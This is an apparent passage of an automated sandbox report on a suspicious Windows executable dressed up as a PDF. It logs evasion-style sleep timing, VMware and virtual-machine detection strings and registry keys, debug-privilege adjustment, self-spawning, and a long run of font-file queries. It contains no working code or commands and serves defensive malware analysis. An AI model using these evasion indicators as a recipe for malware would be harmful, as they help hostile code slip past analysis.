              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 4084Thread sleep time: -41500s >= -30000s
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 5524Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 4072Thread sleep count: 59 > 30
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 4072Thread sleep time: -3540000s >= -30000s
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeMemory allocated: page read and write | page guard
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess created: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe {path}
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.503468124.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.503468124.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.503468124.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.503468124.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
